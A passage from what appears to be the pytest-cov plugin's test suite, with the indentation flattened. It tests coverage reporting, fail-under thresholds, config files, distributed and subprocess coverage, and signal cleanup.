'--cov=%s' % script.dirpath(),
'--cov-report=term:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: "term:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_term_missing_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: '
'"term-missing:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_cov_min_100(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
script)
assert result.ret != 0
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 100% not reached. Total coverage: *%'
])
def test_cov_min_100_passes_if_collectonly(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
'--collect-only',
script)
assert result.ret == 0
def test_cov_min_50(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
'--cov-report=xml',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_cov_min_float_value(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=88.88',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 88.88% reached. Total coverage: 88.89%'
])
def test_cov_min_float_value_not_reached(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=88.89',
script)
assert result.ret == 1
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 88.89% not reached. Total coverage: 88.89%'
])
def test_cov_min_no_report(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_central_nonspecific(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_nonspecific* %s *' % prop.result,
'*10 passed*'
])
# multi-module coverage report
assert any(line.startswith('TOTAL ') for line in result.stdout.lines)
assert result.ret == 0
def test_cov_min_from_coveragerc(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[report]
fail_under = 100
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret != 0
def test_central_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(COVERAGERC_SOURCE + prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_coveragerc* %s *' % prop.result,
'*10 passed*',
])
assert result.ret == 0
@xdist_params
def test_central_with_path_aliasing(testdir, monkeypatch, opts, prop):
mod1 = testdir.mkdir('src').join('mod.py')
mod1.write(SCRIPT)
mod2 = testdir.mkdir('aliased').join('mod.py')
mod2.write(SCRIPT)
script = testdir.makepyfile('''
from mod import *
''')
testdir.tmpdir.join('setup.cfg').write("""
[coverage:paths]
source =
src
aliased
[coverage:run]
source = mod
parallel = true
%s
""" % prop.conf)
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v', '-s',
'--cov',
'--cov-report=term-missing',
script, *opts.split()+prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]mod* %s *' % prop.result,
'*10 passed*',
])
assert result.ret == 0
@xdist_params
def test_borken_cwd(testdir, monkeypatch, opts):
testdir.makepyfile(mod='''
def foobar(a, b):
return a + b
''')
script = testdir.makepyfile('''
import os
import tempfile
import pytest
import mod
@pytest.fixture
def bad():
path = tempfile.mkdtemp('test_borken_cwd')
os.chdir(path)
yield
try:
os.rmdir(path)
except OSError:
pass
def test_foobar(bad):
assert mod.foobar(1, 2) == 3
''')
result = testdir.runpytest('-v', '-s',
'--cov=mod',
'--cov-branch',
script, *opts.split())
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*mod* 100%',
'*1 passed*',
])
assert result.ret == 0
def test_subprocess_with_path_aliasing(testdir, monkeypatch):
src = testdir.mkdir('src')
src.join('parent_script.py').write(SCRIPT_PARENT)
src.join('child_script.py').write(SCRIPT_CHILD)
aliased = testdir.mkdir('aliased')
parent_script = aliased.join('parent_script.py')
parent_script.write(SCRIPT_PARENT)
aliased.join('child_script.py').write(SCRIPT_CHILD)
testdir.tmpdir.join('.coveragerc').write("""
[paths]
source =
src
aliased
[run]
source =
parent_script
child_script
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([
os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]child_script* %s*' % CHILD_SCRIPT_RESULT,
'src[\\/]parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_show_missing_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write("""
[run]
source = .
%s
[report]
show_missing = true
""" % prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Name * Stmts * Miss * Cover * Missing',
'test_show_missing_coveragerc* %s * 11*' % prop.result,
'*10 passed*',
])
assert result.ret == 0
def test_no_cov_on_fail(testdir):
script = testdir.makepyfile('''
def test_fail():
assert False
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov-on-fail',
script)
assert 'coverage: platform' not in result.stdout.str()
result.stdout.fnmatch_lines(['*1 failed*'])
def test_no_cov(testdir, monkeypatch):
script = testdir.makepyfile(SCRIPT)
testdir.makeini("""
[pytest]
addopts=--no-cov
""")
result = testdir.runpytest('-vvv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-rw',
script)
result.stdout.fnmatch_lines_random([
'WARNING: Coverage disabled via --no-cov switch!',
'*Coverage disabled via --no-cov switch!',
])
def test_cov_and_failure_report_on_fail(testdir):
script = testdir.makepyfile(SCRIPT + '''
def test_fail(p):
assert False
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-fail-under=100',
'--cov-report=html',
script)
result.stdout.fnmatch_lines_random([
'*10 failed*',
'*coverage: platform*',
'*FAIL Required test coverage of 100% not reached*',
'*assert False*',
])
@pytest.mark.skipif('sys.platform == "win32" or platform.python_implementation() == "PyPy"')
def test_dist_combine_racecondition(testdir):
script = testdir.makepyfile("""
import pytest
@pytest.mark.parametrize("foo", range(1000))
def test_foo(foo):
""" + "\n".join("""
if foo == %s:
assert True
""" % i for i in range(1000)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '5', '-s',
script)
result.stdout.fnmatch_lines([
'test_dist_combine_racecondition* 0 * 100%*',
'*1000 passed*'
])
for line in chain(result.stdout.lines, result.stderr.lines):
assert 'The following workers failed to return coverage data' not in line
assert 'INTERNALERROR' not in line
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_not_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
%s
[paths]
source =
.
dir1
dir2''' % prop.conf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
max_worker_restart_0, '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_not_collocated_coveragerc_source(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
{}
source = {}
[paths]
source =
.
dir1
dir2'''.format(prop.conf, script.dirpath()))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
max_worker_restart_0, '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_central_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_change_cwd(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT_CHANGE_CWD,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
testdir.makefile('', coveragerc="""
[run]
branch = true
parallel = true
""")
result = testdir.runpytest('-v', '-s',
'--cov=%s' % scripts.dirpath(),
'--cov-config=coveragerc',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
'*parent_script* 100%*',
])
assert result.ret == 0
def test_central_subprocess_change_cwd_with_pythonpath(testdir, monkeypatch):
stuff = testdir.mkdir('stuff')
parent_script = stuff.join('parent_script.py')
parent_script.write(SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD)
stuff.join('child_script.py').write(SCRIPT_CHILD)
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', str(stuff))
result = testdir.runpytest('-vv', '-s',
'--cov=child_script',
'--cov-config=coveragerc',
'--cov-report=term-missing',
'--cov-branch',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_no_subscript(testdir):
script = testdir.makepyfile("""
import subprocess, sys
def test_foo():
subprocess.check_call([sys.executable, '-c', 'print("Hello World")'])
""")
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-branch',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_subprocess_no_subscript* * 3 * 0 * 100%*',
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_subprocess_collocated(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_subprocess_not_collocated(testdir, tmpdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
child_script = scripts.dirpath().join('child_script.py')
dir1 = tmpdir.mkdir('dir1')
dir2 = tmpdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[paths]
source =
%s
*/dir1
*/dir2
''' % scripts.dirpath())
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % child_script,
'--rsyncdir=%s' % parent_script,
'--rsyncdir=.coveragerc',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_invalid_coverage_source(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.makeini("""
[pytest]
console_output_style=classic
""")
result = testdir.runpytest('-v',
'--cov=non_existent_module',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*10 passed*'
])
result.stderr.fnmatch_lines([
'Coverage.py warning: No data was collected.*'
])
result.stdout.fnmatch_lines([
'*Failed to generate report: No data to report.',
])
assert result.ret == 0
matching_lines = [line for line in result.outlines if '%' in line]
assert not matching_lines
@pytest.mark.skipif("'dev' in pytest.__version__")
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_missing_data(testdir):
"""Test failure when using a worker without pytest-cov installed."""
venv_path = os.path.join(str(testdir.tmpdir), 'venv')
virtualenv.cli_run([venv_path])
if sys.platform == 'win32':
if platform.python_implementation() == "PyPy":
exe = os.path.join(venv_path, 'bin', 'python.exe')
else:
exe = os.path.join(venv_path, 'Scripts', 'python.exe')
else:
exe = os.path.join(venv_path, 'bin', 'python')
subprocess.check_call([
exe,
'-mpip',
'install',
'py==%s' % py.__version__,
'pytest==%s' % pytest.__version__,
'pytest_xdist==%s' % xdist.__version__
])
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//python=%s' % exe,
max_worker_restart_0,
script)
result.stdout.fnmatch_lines([
'The following workers failed to return coverage data, ensure that pytest-cov is installed on these workers.'
])
def test_funcarg(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_funcarg* 3 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_funcarg_not_active(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG_NOT_ACTIVE)
result = testdir.runpytest('-v',
script)
result.stdout.fnmatch_lines([
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif("sys.version_info[0] < 3", reason="no context manager api on Python 2")
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('platform.python_implementation() == "PyPy"', reason="often deadlocks on PyPy")
@pytest.mark.skipif('sys.version_info[:2] >= (3, 8)', reason="deadlocks on Python 3.8+, see: https://bugs.python.org/issue38227")
def test_multiprocessing_pool(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
for i in range(33):
with multiprocessing.Pool(3) as p:
p.map(target_fn, [i * 3 + j for j in range(3)])
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('platform.python_implementation() == "PyPy"', reason="often deadlocks on PyPy")
@pytest.mark.skipif('sys.version_info[:2] >= (3, 8)', reason="deadlocks on Python 3.8, see: https://bugs.python.org/issue38227")
def test_multiprocessing_pool_terminate(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
for i in range(33):
p = multiprocessing.Pool(3)
try:
p.map(target_fn, [i * 3 + j for j in range(3)])
finally:
p.terminate()
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('sys.version_info[0] > 2 and platform.python_implementation() == "PyPy"', reason="broken on PyPy3")
def test_multiprocessing_pool_close(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
for i in range(33):
p = multiprocessing.Pool(3)
try:
p.map(target_fn, [i * 3 + j for j in range(3)])
finally:
p.close()
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert "Doesn't seem to be a coverage.py data file" not in result.stdout.str()
assert "Doesn't seem to be a coverage.py data file" not in result.stderr.str()
assert not testdir.tmpdir.listdir(".coverage.*")
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_pool* 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process_no_source(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
def test_multiprocessing_process_with_terminate(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
import time
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
event = multiprocessing.Event()
def target_fn():
a = True
event.set()
time.sleep(5)
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
time.sleep(0.5)
event.wait(1)
p.terminate()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_process* 16 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGTERM isn't really supported on Windows")
def test_cleanup_on_sigterm(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def cleanup(num, frame):
print("num == signal.SIGTERM => %s" % (num == signal.SIGTERM))
raise Exception()
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b"""num == signal.SIGTERM => True
captured Exception()
"""
assert proc.returncode == 0
if __name__ == "__main__":
signal.signal(signal.SIGTERM, cleanup)
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 26-27',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform != "win32"')
@pytest.mark.parametrize('setup', [
('signal.signal(signal.SIGBREAK, signal.SIG_DFL); cleanup_on_signal(signal.SIGBREAK)', '87% 21-22'),
('cleanup_on_signal(signal.SIGBREAK)', '87% 21-22'),
('cleanup()', '73% 19-22'),
])
def test_cleanup_on_sigterm_sig_break(testdir, setup):
# worth a read: https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen(
[sys.executable, __file__],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP, shell=True
)
time.sleep(1)
proc.send_signal(signal.CTRL_BREAK_EVENT)
stdout, stderr = proc.communicate()
assert not stderr
assert stdout in [b"^C", b"", b"captured IOError(4, 'Interrupted function call')\\n"]
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_signal, cleanup
''' + setup[0] + '''
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* %s' % setup[1],
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGTERM isn't really supported on Windows")
@pytest.mark.parametrize('setup', [
('signal.signal(signal.SIGTERM, signal.SIG_DFL); cleanup_on_sigterm()', '88% 18-19'),
('cleanup_on_sigterm()', '88% 18-19'),
('cleanup()', '75% 16-19'),
])
def test_cleanup_on_sigterm_sig_dfl(testdir, setup):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b""
assert proc.returncode in [128 + signal.SIGTERM, -signal.SIGTERM]
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_sigterm, cleanup
''' + setup[0] + '''
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* %s' % setup[1],
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="SIGINT is subtly broken on Windows")
def test_cleanup_on_sigterm_sig_dfl_sigint(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.send_signal(signal.SIGINT)
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b"""captured KeyboardInterrupt()
"""
assert proc.returncode == 0
if __name__ == "__main__":
from pytest_cov.embed import cleanup_on_signal
cleanup_on_signal(signal.SIGINT)
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 88% 19-20',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"', reason="fork not available on Windows")
def test_cleanup_on_sigterm_sig_ign(testdir):
script = testdir.makepyfile('''
import os, signal, subprocess, sys, time
def test_run():
proc = subprocess.Popen([sys.executable, __file__], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
proc.send_signal(signal.SIGINT)
time.sleep(1)
proc.terminate()
stdout, stderr = proc.communicate()
assert not stderr
assert stdout == b""
# it appears signal handling is buggy on python 2?
if sys.version_info[0] == 3: assert proc.returncode in [128 + signal.SIGTERM, -signal.SIGTERM]
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_IGN)
from pytest_cov.embed import cleanup_on_signal
cleanup_on_signal(signal.SIGINT)
try:
time.sleep(10)
except BaseException as exc:
print("captured %r" % exc)
''')
result = testdir.runpytest('-vv',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_cleanup_on_sigterm* 89% 23-24',
'*1 passed*'
])
assert result.ret == 0
MODULE = '''
def func():
return 1
'''
CONFTEST = '''
import mod
mod.func()
'''
BASIC_TEST = '''
def test_basic():
x = True
assert x
'''
CONF_RESULT = 'mod* 2 * 100%*'
def test_cover_conftest(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cover_looponfail(testdir, monkeypatch):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
def mock_run(*args, **kwargs):
return _TestProcess(*map(str, args))
monkeypatch.setattr(testdir, 'run', mock_run)
assert testdir.run is mock_run
if hasattr(testdir, '_pytester'):
monkeypatch.setattr(testdir._pytester, 'run', mock_run)
assert testdir._pytester.run is mock_run
with testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--looponfail',
script) as process:
with dump_on_error(process.read):
wait_for_strings(
process.read,
30, # 30 seconds
'Stmts Miss Cover'
)
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_cover_conftest_dist(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_no_cover_marker(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import pytest
import mod
import subprocess
import sys
@pytest.mark.no_cover
def test_basic():
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
def test_no_cover_fixture(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import mod
import subprocess
import sys
def test_basic(no_cover):
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
COVERAGERC = '''
[report]
# Regexes for lines to exclude from consideration
exclude_lines =
raise NotImplementedError
'''
EXCLUDED_TEST = '''
def func():
raise NotImplementedError
def test_basic():
x = True
assert x
'''
